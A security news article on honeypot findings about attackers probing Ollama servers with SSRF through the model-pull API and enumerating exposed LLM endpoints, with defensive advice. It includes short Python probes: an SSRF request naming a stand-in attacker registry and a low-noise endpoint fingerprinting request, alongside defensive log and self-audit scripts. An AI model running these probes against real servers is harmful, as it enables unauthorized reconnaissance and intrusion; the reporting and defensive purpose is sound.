Attackers Are Quietly Mapping the AI Stack—and the Reconnaissance Phase Is Nearly Over
- Cyber Jill
For years, defenders have warned that artificial intelligence would expand the attack surface. What they lacked was proof that adversaries were already doing the math.
That proof is now emerging from telemetry captured deep inside live AI infrastructure.
Between October 2025 and January 2026, researchers operating an Ollama-based honeypot observed more than 91,000 attack sessions, revealing two distinct campaigns that illuminate how threat actors are methodically charting the rapidly growing ecosystem of large language model deployments. One campaign focused on coercing servers into making outbound connections. The other was something more unsettling: a systematic census of exposed LLM endpoints across nearly every major commercial model family.
Together, the activity suggests that attackers are no longer experimenting with AI systems. They are cataloging them.
Forcing Servers to Phone Home
The first campaign revolved around classic server-side request forgery (SSRF), updated for the AI era.
Attackers targeted Ollama’s model-pull mechanism, injecting malicious registry URLs designed to force servers into making outbound HTTP requests to attacker-controlled infrastructure. In parallel, the same infrastructure was observed abusing Twilio SMS webhook integrations by manipulating MediaUrl parameters—an overlap that suggests shared tooling and operational coordination rather than coincidence.
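To make the technique concrete, here is a minimal sketch of what such a probe could look like. It assumes a default Ollama API listening on port 11434; the `/api/pull` endpoint and its JSON payload follow Ollama's public API, while the target host and the out-of-band callback domain are hypothetical placeholders, not values observed in the campaign.

```python
# Hedged sketch: an SSRF probe against Ollama's model-pull API.
# The /api/pull endpoint and payload shape come from Ollama's public API docs;
# the target host and "oob.example.net" callback domain are hypothetical.
import requests

TARGET = "http://exposed-ollama.example.com:11434"  # hypothetical exposed server

# A model name pointing at an attacker-controlled registry. If the server
# honors it, Ollama resolves the registry host and issues an outbound HTTP
# request to it: the out-of-band callback that confirms the SSRF.
payload = {"model": "oob.example.net/library/probe:latest"}

resp = requests.post(f"{TARGET}/api/pull", json=payload, timeout=10)
print(resp.status_code, resp.text[:200])
```

The out-of-band domain is what ties the technique to ProjectDiscovery-style testing infrastructure: the attacker learns nothing from the HTTP response itself, only from whether their listener receives a callback.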
What made the campaign stand out was not its sophistication, but its scale and precision. Nearly all traffic shared a single JA4H fingerprint, strongly indicating automated scanning powered by tools like Nuclei. The infrastructure spanned dozens of countries, yet the consistency of the signatures revealed centralized VPS-based operations rather than a distributed botnet.
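On the defensive side, that signal is easy to surface once HTTP sessions carry a JA4H hash. Below is a minimal sketch, assuming session logs exported to CSV with `ja4h` and `src_ip` columns (both column names and the file path are hypothetical and depend on your sensor's schema): grouping by fingerprint makes a single dominant hash, the hallmark of one toolchain behind many IPs, stand out immediately.

```python
# Hedged sketch: group proxy/honeypot sessions by JA4H fingerprint.
# Assumes a CSV export with "ja4h" and "src_ip" columns; both names are
# hypothetical and depend on your sensor's log schema.
import csv
from collections import Counter, defaultdict

fingerprints = Counter()
ips_per_fp = defaultdict(set)

with open("sessions.csv", newline="") as fh:
    for row in csv.DictReader(fh):
        fingerprints[row["ja4h"]] += 1
        ips_per_fp[row["ja4h"]].add(row["src_ip"])

# One fingerprint covering most sessions across many source IPs points to
# centralized, automated tooling rather than a diverse botnet.
for fp, count in fingerprints.most_common(5):
    print(f"{fp}: {count} sessions from {len(ips_per_fp[fp])} source IPs")
```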
A sharp spike over the Christmas holiday—nearly 1,700 sessions in just 48 hours—hinted at operators unconstrained by corporate calendars.
While the use of ProjectDiscovery’s out-of-band testing infrastructure aligns with common bug-bounty techniques, the volume and timing blur the line between research and grey-hat exploitation. Even if the intent was discovery, the result was confirmation: AI-adjacent services are responding in predictable, testable ways to SSRF pressure.
The Enumeration Campaign That Changes the Risk Equation
If the SSRF activity raised eyebrows, the second campaign should raise alarms.
Beginning on December 28, two IP addresses launched a methodical sweep of more than 70 distinct LLM endpoints, generating over 80,000 sessions in eleven days. The objective was not exploitation—it was identification.
Requests were deliberately bland: “hi,” basic trivia questions, even empty prompts. These queries are unlikely to trigger alerts, yet they are highly effective at fingerprinting which model responds, how proxies are configured, and whether access controls are misapplied.
The probe list read like a who’s who of modern AI: OpenAI-compatible APIs, Google Gemini formats, Anthropic Claude variants, Meta’s Llama, DeepSeek, Mistral, Qwen, and Grok. The message was clear: no major model ecosystem was excluded.
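To see why such bland prompts work, consider a hedged sketch of a single low-noise probe against an OpenAI-compatible endpoint. The base URL and key are hypothetical placeholders; the request shape is the standard chat-completions format that Ollama, vLLM, and many gateways also expose. Because Anthropic-style backends expect a different path and payload, and Gemini-style backends a different one again, the shape that succeeds narrows down the API family, and the response names the model outright.

```python
# Hedged sketch: a low-noise fingerprinting probe against an OpenAI-compatible
# endpoint. The base URL and key are hypothetical; the request shape is the
# standard /v1/chat/completions format. Anthropic-style backends use
# /v1/messages and Gemini-style backends use /v1beta/models/<model>:generateContent,
# so the path and payload shape alone reveal which family sits behind a proxy.
import requests

BASE_URL = "http://exposed-llm.example.com/v1"  # hypothetical endpoint
headers = {"Authorization": "Bearer test"}      # often ignored on misconfigured proxies

probe = {
    "model": "gpt-3.5-turbo",  # a guess; error messages frequently leak the real model list
    "messages": [{"role": "user", "content": "hi"}],
}

resp = requests.post(f"{BASE_URL}/chat/completions", json=probe,
                     headers=headers, timeout=10)

# A 200 with a "model" field identifies the backend outright; a structured
# error often reveals the serving stack instead.
print(resp.status_code)
try:
    print(resp.json().get("model", "no model field in response"))
except ValueError:
    print(resp.text[:200])
```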
Unlike the earlier SSRF campaign, this activity traced back to infrastructure already associated with large-scale CVE exploitation. Historical data ties the same IP space to hundreds of vulnerabilities and millions of scanning events, indicating a professional operation feeding reconnaissance data into a broader attack pipeline.
This was not curiosity. It was preparation.
From Models to Agents
Security teams have long treated models as the primary object of AI defense—guarding prompts, filtering outputs, hardening APIs. But the reconnaissance underway suggests attackers are thinking several steps ahead.
Chris Hughes, VP of Security Strategy at Zenity, sees the current wave of enumeration as an opening move rather than an end goal.
“While this marks the first public confirmation of attackers targeting AI systems, it certainly won’t be the last. The information gained from probing LLMs will be used in future malicious activity, making it critical for security teams to understand which AI systems and agents are in place, where they are exposed, and how to respond.
“The GreyNoise findings show adversaries systematically enumerating LLM endpoints and testing for misconfigurations, which is classic reconnaissance behavior that precedes exploitation. Model security remains a necessary layer of defense. But the greater risk emerges when AI agents invoke tools, access enterprise systems, and execute actions across SaaS, cloud, and developer environments.
“Most organizations lack basic visibility into which agents exist, how they are configured, what permissions they hold, or how they behave at runtime. Security teams need to expand their focus to govern agents by enforcing policy at build time and detecting anomalous behavior at the action level. As attackers move from probing models to exploiting agents, organizations that focus only on model-centric security will be responding to incidents they never saw coming.”
The implication is stark: enumerating models is merely how attackers build the map. Agents—connected, permissioned, and capable of action—are the terrain they intend to cross.
The New Reconnaissance Reality
Defenders are accustomed to seeing scans before exploits. What’s different now is the target.
AI infrastructure blends APIs, developer tools, cloud services, and autonomous workflows in ways traditional asset inventories fail to capture. An exposed endpoint isn’t just a data leak risk—it can be a gateway into decision-making systems that act on behalf of the enterprise.
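A practical first step is simply knowing what you expose. The sketch below, in which the host list and port are hypothetical examples, checks whether internal hosts answer Ollama's documented `/api/tags` model-listing endpoint without authentication, a quick self-audit that mirrors what the enumeration campaign is doing from the outside.

```python
# Hedged sketch: self-audit for exposed Ollama-style endpoints on your own hosts.
# The host list is a hypothetical example; 11434 is Ollama's default port and
# /api/tags is its documented endpoint for listing locally available models.
import requests

HOSTS = ["10.0.0.12", "10.0.0.45"]  # hypothetical: replace with your inventory
PORT = 11434

for host in HOSTS:
    url = f"http://{host}:{PORT}/api/tags"
    try:
        resp = requests.get(url, timeout=3)
    except requests.RequestException:
        continue  # closed or filtered: nothing exposed here
    if resp.ok:
        models = [m.get("name") for m in resp.json().get("models", [])]
        print(f"{host}:{PORT} answers without auth; models: {models}")
```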
The sheer volume of enumeration traffic observed—tens of thousands of requests across multiple model families—represents time, compute, and intent. Threat actors don’t invest at that scale unless they expect a return.
For organizations running public or semi-public LLM endpoints, the uncomfortable conclusion is unavoidable: reconnaissance is already happening, quietly and systematically. And in the attacker playbook, mapping always comes before exploitation.